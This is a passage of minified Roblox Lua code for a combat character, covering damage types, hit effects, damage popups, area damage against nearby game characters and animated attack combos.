game:GetService("Debris"):AddItem(v,5)v.Parent=gw;coroutine.resume(coroutine.create(function()for T=1,35 do coroutine.resume(coroutine.create(function()v:Emit(2)end))coroutine.resume(coroutine.create(function()Damagefunc(gw,gw,4/2,6/2,0,"Normal",RootPart,0.1,"1273118342",math.random(10,30)/10)end))if gw.Parent:FindFirstChildOfClass("Humanoid")and gw.Parent:FindFirstChildOfClass("Humanoid").Health>.01 then else for U,eM in next,gw.Parent:GetDescendants()do if eM:isA("BasePart")then SetTween(eM,{Color=C3(0,0,0)},"Quad","Out",.5)end end;break end;wait(.1)end end))end end;kX:Destroy()else end elseif gf=="Instakill"then coroutine.resume(coroutine.create(function()if(h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso"))and not h.Parent:FindFirstChild("Fly away")then local gj=Instance.new("Model",h.Parent)gj.Name="Fly away"game:GetService("Debris"):AddItem(gj,2.5)for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=true end end;wait(.25)if h.Parent:FindFirstChildOfClass("Body Colors")then h.Parent:FindFirstChildOfClass("Body Colors"):Destroy()end;local gk=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")coroutine.resume(coroutine.create(function()local gl=Instance.new("Part")gl.Reflectance=0;gl.Transparency=1;gl.CanCollide=false;gl.Locked=true;gl.Anchored=true;gl.BrickColor=BrickColor.new("Really blue")gl.Name="YourGone"gl.Size=Vector3.new()gl.Material="SmoothPlastic"gl:BreakJoints()gl.Parent=gk;gl.CFrame=gk.CFrame;local gm=Instance.new("ParticleEmitter")gm.Parent=gl;gm.Acceleration=Vector3.new(0,0,0)gm.Size=NumberSequence.new({NumberSequenceKeypoint.new(0,10),NumberSequenceKeypoint.new(1,.0)})gm.Color=ColorSequence.new(Color3.new(1,0,0),Color3.new(1,0,0))gm.Lifetime=NumberRange.new(0.55,0.95)gm.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.25,.0),NumberSequenceKeypoint.new(1,1)})gm.Speed=NumberRange.new(0,0.0)gm.ZOffset=2;gm.Texture="rbxassetid://243660364"gm.RotSpeed=NumberRange.new(-0,0)gm.Rotation=NumberRange.new(-180,180)gm.Enabled=false;game:GetService("Debris"):AddItem(gl,3)for T=0,2,1 do gm:Emit(1)so("1448044156",gk,2,1)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(50,100)/1000)end end;wait(.2)end;wait(.1)gm:Emit(3)so("1448044156",gk,2,.8)h.Parent:BreakJoints()gl.CFrame=gk.CFrame;for U,v in pairs(h.Parent:children())do if v:IsA("BasePart")and v.Parent:FindFirstChildOfClass("Humanoid")then v.Anchored=false;if v:FindFirstChildOfClass("SpecialMesh")then end;if v:FindFirstChildOfClass("Decal")and v.Name=="face"then end;local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(1000,1000,1000),velocity=Vector3.new(math.random(-10,10),4,math.random(-10,10))})gn.Parent=v;game:GetService("Debris"):AddItem(gn,math.random(100,200)/1000)end end end))wait(.1)end end))elseif gf=="HPSteal"then Humanoid.Health=Humanoid.Health+Damage;local hum=h;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)Combo=1;wait(.2)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=CFrame.new(Part.Position,gg.Position).lookVector*ge})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(5000,5000,5000)*50,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.2)game:GetService("Debris"):AddItem(gu,0.2)local gv=Create("BodyVelocity")({velocity=Vector3.new(0,60,0),P=5000,maxForce=Vector3.new(8000,12000,8000),Parent=RootPart})game:GetService("Debris"):AddItem(gv,0.1)elseif gf=="Impale"then CFuncs.Sound.Create("http://www.roblox.com/asset/?id=268249319",Spike,.8,2)hit.Parent.Humanoid.PlatformStand=true;wait(1)hit.Parent.Humanoid.PlatformStand=false elseif gf=="IgnoreType"then elseif gf=="Up"then local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,0.1)local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,.1)elseif gf=="Snare"then local gy=Create("BodyPosition")({P=900,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=h.Parent:FindFirstChild("Torso")or h.Parent:FindFirstChild("UpperTorso")})game:GetService("Debris"):AddItem(gy,1)elseif gf=="Freeze2"then local gz=Create("BodyPosition")({P=50000,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})local gA=Create("BodyGyro")({maxTorque=Vector3.new(400000,400000,400000)*math.huge,P=20000,Parent=hit.Parent.Torso,cframe=hit.Parent.Torso.CFrame})hit.Parent.Torso.Anchored=true;coroutine.resume(coroutine.create(function(Part)wait(1.5)Part.Anchored=false end),hit.Parent.Torso)game:GetService("Debris"):AddItem(gz,3)game:GetService("Debris"):AddItem(gA,3)end;local gB=Create("BoolValue")({Name="DebounceHit",Parent=hit.Parent,Value=true})game:GetService("Debris"):AddItem(gB,Delay)c=Instance.new("ObjectValue")c.Name="creator"c.Value=Player;c.Parent=h;game:GetService("Debris"):AddItem(c,0.5)end end;ShowDamage=function(eS,gC,gD,Color)local eE=0.033333333333333;if not eS then local eS=Vector3.new(0,0,0)end;local gC=gC or""local gD=gD or 2;if not Color then local Color=Color3.new(1,0,1)end;local gE=CreatePart(workspace,"SmoothPlastic",0,1,BrickColor.new(Color),"Effect",Vector3.new(0,0,0))gE.Anchored=true;local gF=Create("BillboardGui")({Size=UDim2.new(2,0,2,0),Adornee=gE,Parent=gE})local gG=Create("TextLabel")({BackgroundTransparency=1,Size=UDim2.new(1,0,1,0),Text="DMG: "..gC.."",TextColor3=Color,TextScaled=true,Font=Enum.Font.ArialBold,Parent=gF})gG.TextTransparency=1;game.Debris:AddItem(gE,gD+0.1)gE.Parent=game:GetService("Workspace")delay(0,function()local gH=gD/eE;gE.CFrame=CFrame.new(eS)wait()gG.TextTransparency=0;SetTween(gG,{TextTransparency=1},"Quad","In",gH/60)SetTween(gG,{Rotation=math.random(-25,25)},"Elastic","InOut",gH/60)SetTween(gG,{TextColor3=Color3.new(1,0,0)},"Elastic","InOut",gH/60)SetTween(gE,{CFrame=CFrame.new(eS)+Vector3.new(math.random(-5,5),math.random(1,5),math.random(-5,5))},"Linear","InOut",gH/60)wait(gH/60)if gE and gE.Parent then gE:Destroy()end end)end;MagniDamage=function(Part,gI,gJ,gK,gL,gM)local gf=""if mememode==true then gf="Instakill"else gf=gM end;if gM=="NormalKnockdown"then gf="Knockdown"end;for U,c in pairs(workspace:children())do local hum=c:FindFirstChild("Humanoid")for U,v in pairs(c:children())do if v:IsA("Humanoid")then hum=v end end;if hum~=nil then local head=c:findFirstChild("Head")if head~=nil then local gN=head.Position-Part.Position;local gO=gN.magnitude;if gO<=gI and c.Name~=Player.Name then Damagefunc(Part,head,gJ,gK,gL,gf,RootPart,0.1,"851453784",1.2)end end end end end;function CFMagniDamage(gP,gI,gJ,gK,gL,gf)local gQ=Instance.new("Part")gQ.Parent=Character;gQ.Size=Vector3.new(0.05,0.05,0.05)gQ.Transparency=1;gQ.CanCollide=false;gQ.Anchored=true;RemoveOutlines(gQ)gQ.Position=gQ.Position+Vector3.new(0,-.1,0)gQ.CFrame=gP;coroutine.resume(coroutine.create(function()MagniDamage(gQ,gI,gJ,gK,gL,gf)end))game:GetService("Debris"):AddItem(gQ,.05)gQ.Archivable=false end;function BulletHitEffectSpawn(gZ,g_)local h0=Instance.new("Part",Effects)h0.Reflectance=0;h0.Transparency=1;h0.CanCollide=false;h0.Locked=true;h0.Anchored=true;h0.BrickColor=BrickColor.new("Bright green")h0.Name="Bullet"h0.Size=Vector3.new(.05,.05,.05)h0.Material="Neon"h0:BreakJoints()h0.CFrame=gZ;local h1=Instance.new("Attachment",h0)game:GetService("Debris"):AddItem(h0,15)if g_=="Explode"then h1.Orientation=Vector3.new(90,0,0)local h3=EffectPack.Bang2:Clone()h3.Parent=h0;h3:Emit(150)local h4=EffectPack.Bang1:Clone()h4.Parent=h0;h4:Emit(25)local h5=EffectPack.Bang3:Clone()h5.Parent=h0;h5:Emit(185)game:GetService("Debris"):AddItem(h0,2)end;if g_=="Spark"then h1.Orientation=Vector3.new(90,0,0)local h3=EffectPack.Spark:Clone()h3.Parent=h0;h3:Emit(1)game:GetService("Debris"):AddItem(h0,2)end;if g_=="ShockWave"then h1.Orientation=Vector3.new(90,0,0)local h3=EffectPack.ShockWave1:Clone()h3.Parent=h0;h3:Emit(0)local h4=EffectPack.ShockWave2:Clone()h4.Parent=h0;h4:Emit(2)game:GetService("Debris"):AddItem(h0,2)end;if g_=="Nuke"then so(923073285,h0,8,2)h1.Orientation=Vector3.new(0,0,0)local kZ=Instance.new("Attachment",h0)kZ.Orientation=Vector3.new(0,0,0)local h3=EffectPack.Nuke_Flash:Clone()h3.Parent=h1;h3:Emit(20)local h4=EffectPack.Nuke_Smoke:Clone()h4.Parent=kZ;h4.Enabled=true;coroutine.resume(coroutine.create(function()for T=0,2,.025/1.5 do h4.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.15,.5+T/4),NumberSequenceKeypoint.new(.95,.5+T/4),NumberSequenceKeypoint.new(1,1)})Swait()end;h4.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(1,1)})h4.Enabled=false end))local h5=EffectPack.Nuke_Wave:Clone()h5.Parent=h1;h5:Emit(185)game:GetService("Debris"):AddItem(h1,10)end end;local hI=weld(dT.Parent,dT.Part0,dT.Part1,dT.C0)hI.C1=dT.C1;hI.Name=dT.Name;local hJ=weld(Neck.Parent,Neck.Part0,Neck.Part1,Neck.C0)hJ.C1=Neck.C1;hJ.Name=Neck.Name;local RW=weld(Torso,Torso,RightArm,cf(0,0,0))local LW=weld(Torso,Torso,LeftArm,cf(0,0,0))local RH=weld(Torso,Torso,RightLeg,cf(0,0,0))local LH=weld(Torso,Torso,LeftLeg,cf(0,0,0))RW.C1=cn(0,0.5,0)LW.C1=cn(0,0.5,0)RH.C1=cn(0,1,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))LH.C1=cn(0,1,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-0.90,0)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-0.90,0)},"Quad","InOut",0.1)function AT1()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(-40))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(40))},"Quad","InOut",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(30),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(30),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(RH,{C0=CFrame.new(.5,-.6,-.4)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(20))},"Quad","InOut",0.2)wait(.2/f2)CFMagniDamage(RootPart.CFrame*CF(0,-1,-1),7,10,20,20,"Normal")SetTween(hI,{C0=RootCF*CFrame.new(0,-1,0)*angles(math.rad(-40),math.rad(0),math.rad(40))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-40))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(-30),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(-30),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(120),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-60),math.rad(0),math.rad(-20))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT2()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(60))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-60))},"Quad","InOut",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(RH,{C0=CFrame.new(.5,-.5,-.4)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)CFMagniDamage(RootPart.CFrame*CF(0,-0,-1),9,10,15,0,"Normal")wait(.2/f2)SetTween(hI,{C0=RootCF*CFrame.new(0,-1,0)*angles(math.rad(0),math.rad(0),math.rad(-70))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(70))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(-20),math.rad(-90))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT3()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(120))},"Quad","In",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-80))},"Quad","InOut",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(20))},"Quad","InOut",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(20),math.rad(-0),math.rad(-0))},"Quad","InOut",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=CFrame.new(-.5,-.8,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)wait(.2/f2)CFMagniDamage(RootPart.CFrame*CF(-2,-.25,-1),9,20,30,10,"Knockdown")SetTween(hI,{C0=RootCF*CFrame.new(0,-1,0)*angles(math.rad(20),math.rad(0),math.rad(-0))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(90))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(20),math.rad(-0),math.rad(-0))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-0)*angles(math.rad(-40),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT4()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(-80))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(80))},"Quad","InOut",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(-20),math.rad(-70),math.rad(-90))},"Quad","InOut",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-.0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=CFrame.new(-.5,-.5,-0.4)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)CFMagniDamage(RootPart.CFrame*CF(0,-0,-1),9,30,45,0,"Normal")so("3051417237",LeftArm,3,math.random(100,155)/100)wait(0.2/f2)SetTween(hI,{C0=RootCF*CFrame.new(0,-1,0)*angles(math.rad(20),math.rad(0),math.rad(45))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(-45))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(-0),math.rad(-90))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-10),math.rad(0),math.rad(0))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT5()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(80))},"Quad","InOut",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(-80))},"Quad","InOut",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(-20),math.rad(70),math.rad(90))},"Quad","InOut",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-90))},"Quad","InOut",0.2)SetTween(RH,{C0=CFrame.new(.5,-.5,-0.4)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,-0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Quad","InOut",0.2)CFMagniDamage(RootPart.CFrame*CF(0,-0,-1),9,30,45,0,"Normal")so("3051417237",RightArm,3,math.random(100,155)/80)wait(0.2/f2)SetTween(hI,{C0=RootCF*CFrame.new(0,-1,0)*angles(math.rad(20),math.rad(0),math.rad(-45))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(45))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(90))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(-0),math.rad(0))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,-0)*angles(math.rad(-10),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT6()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;SetTween(hI,{C0=RootCF*CFrame.new(0,-1,-.3)*angles(math.rad(45),math.rad(0),math.rad(0))},"Quad","Out",0.3)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Quad","Out",0.3)SetTween(RW,{C0=CFrame.new(1.1,0.5,-.3)*angles(math.rad(20),math.rad(115),math.rad(90))},"Quad","In",0.15)SetTween(LW,{C0=CFrame.new(-1.1,0.5,-.3)*angles(math.rad(20),math.rad(-115),math.rad(-90))},"Quad","In",0.15)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(-60),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(60),math.rad(0),math.rad(0))},"Quad","Out",0.3)so("3051417237",Torso,3,math.random(140,185)/80)CFMagniDamage(RootPart.CFrame*CF(-1.4,-0,-1),9,40,55,10,"Knockdown")CFMagniDamage(RootPart.CFrame*CF(1.4,-0,-1),9,40,55,10,"Knockdown")wait(0.175/f2)SetTween(hI,{C0=RootCF*CFrame.new(0,-1.7,-.4)*angles(math.rad(45),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(90))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-90))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(65),math.rad(0),math.rad(0))},"Back","Out",0.2)wait(.2/f2)dS=false end;function AT7()dS=true;local f2=1;if dS==true and mememode==true then f2=5 end;so("3051417237",Torso,3,.8)coroutine.resume(coroutine.create(function()for T=1,2 do Swait(3)so("3051417087",RightArm,3,math.random(100,155)/100)end end))for T=1,10,1 do SetTween(hI,{C0=RootCF*CFrame.new(0,-1.7+.17*T,-.4)*angles(math.rad(25-5*T),math.rad(0),math.rad(36*T))},"Quad","Out",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(180),math.rad(0),math.rad(90))},"Quad","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-90))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(-25),math.rad(0),math.rad(0))},"Quad","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(25),math.rad(0),math.rad(0))},"Quad","Out",0.2)CFMagniDamage(RootPart.CFrame*CF(1.4,-0,-1+.17*T),9,10,15,10,"Knockdown")Swait()end;dS=false end;function joke()end;function Attack1()dS=true;Humanoid.JumpPower=0;Humanoid.WalkSpeed=0.1;so("299058146",RightArm,2,2.5)SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(-20))},"Back","Out",0.6)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(20))},"Back","Out",0.6)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(-10),math.rad(0),math.rad(20))},"Back","Out",0.6)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(-20))},"Back","Out",0.6)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(-20),math.rad(0),math.rad(0))},"Back","Out",0.6)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(20),math.rad(0),math.rad(0))},"Back","Out",0.6)Swait(.2*30)coroutine.resume(coroutine.create(function()local h1=Instance.new("Attachment",RightArm)h1.Orientation=Vector3.new(0,0,0)h1.Position=Vector3.new(0,-1,0)local h3=EffectPack.Spark:Clone()h3.Parent=h1;h3:Emit(1)game:GetService("Debris"):AddItem(h1,2)end))local k_=Instance.new("Part")k_.Reflectance=0;k_.Transparency=1;k_.CanCollide=false;k_.Locked=true;k_.Anchored=false;k_.BrickColor=BrickColor.new("Really blue")k_.Name="BHandle"k_.Size=Vector3.new(2.5,1,2.5)k_.Material="SmoothPlastic"k_:BreakJoints()k_.Parent=Effects;k_.CFrame=RootPart.CFrame;k_.Massless=false;local l0=weld(k_,RootPart,k_,cf(0,0,-3)*angles(math.rad(0),math.rad(0),math.rad(0)))local l1=false;local function onTouch(l2)if l1==false then local c=l2.Parent;local h=l2.Parent:FindFirstChild("Humanoid")for U,v in pairs(l2.Parent:children())do if v:IsA("Humanoid")then h=v end end;local head=c:FindFirstChild("Torso")or c:FindFirstChild("UpperTorso")local l3=c:FindFirstChild("Head")if h~=nil and head~=nil and l3~=nil then l1=true;head.Anchored=true;coroutine.resume(coroutine.create(function()k_:Destroy()end))local l4=Instance.new("Part")l4.Reflectance=0;l4.Transparency=1;l4.CanCollide=false;l4.Locked=true;l4.Anchored=true;l4.BrickColor=BrickColor.new("Really blue")l4.Name="FHandle"l4.Size=Vector3.new(1,1,1)l4.Material="SmoothPlastic"l4:BreakJoints()l4.Parent=Effects;l4.CFrame=RootPart.CFrame;l4.Massless=false;local l5=joint(l4,RootPart,l4,cf())local l6=25-4.5*1;local h1=Instance.new("Attachment",RightArm)h1.Orientation=Vector3.new(0,0,0)h1.Position=Vector3.new(0,-1,0)local h3=EffectPack.UpperCutSmoke:Clone()h3.Parent=h1;h3.Enabled=true;game:GetService("Debris"):AddItem(h1,5)so("231917750",Torso,2,0.9)for T=1,10,0.4 do SetTween(hI,{C0=RootCF*CFrame.new(-0.5*math.sin(T),0.5*math.cos(T),0)*angles(math.rad(25-4.5*T),math.rad(0),math.rad(36*T*2))},"Quad","InOut",0.05)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(20),math.rad(0),math.rad(-80))},"Quad","InOut",0.15)SetTween(RW,{C0=CFrame.new(1.5,0.65,-.0)*angles(math.rad(160+2*T),math.rad(0),math.rad(30-3*T))},"Quad","Out",0.15)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","Out",0.15)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(0+6.5*T),math.rad(0),math.rad(0))},"Quad","InOut",0.15)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(0-6.5*T),math.rad(0),math.rad(0))},"Quad","InOut",0.15)SetTween(head,{CFrame=RootPart.CFrame*CF(0,0,-1)*angles(math.rad(math.random(-180,180)),math.rad(math.random(-180,180)),math.rad(math.random(-180,180)))},"Quad","InOut",0.05)SetTween(l5,{C0=CFrame.new(0,-T*2,T/2)},"Quad","InOut",0.05)l6=l6+75;if l6>180 then l6=-180;print(1)end;if l6>-45 and l6<45 then BulletHitEffectSpawn(head.CFrame,"ShockWave")so("471882019",head,3,2.5)end;Swait()end;h3.Enabled=false;coroutine.resume(coroutine.create(function()local h1=Instance.new("Attachment",RightArm)h1.Orientation=Vector3.new(0,0,0)h1.Position=Vector3.new(0,-1,0)local h3=EffectPack.Spark:Clone()h3.Parent=h1;h3:Emit(1)game:GetService("Debris"):AddItem(h1,2)end))coroutine.resume(coroutine.create(function()local h1=Instance.new("Attachment",LeftArm)h1.Orientation=Vector3.new(0,0,0)h1.Position=Vector3.new(0,-1,0)local 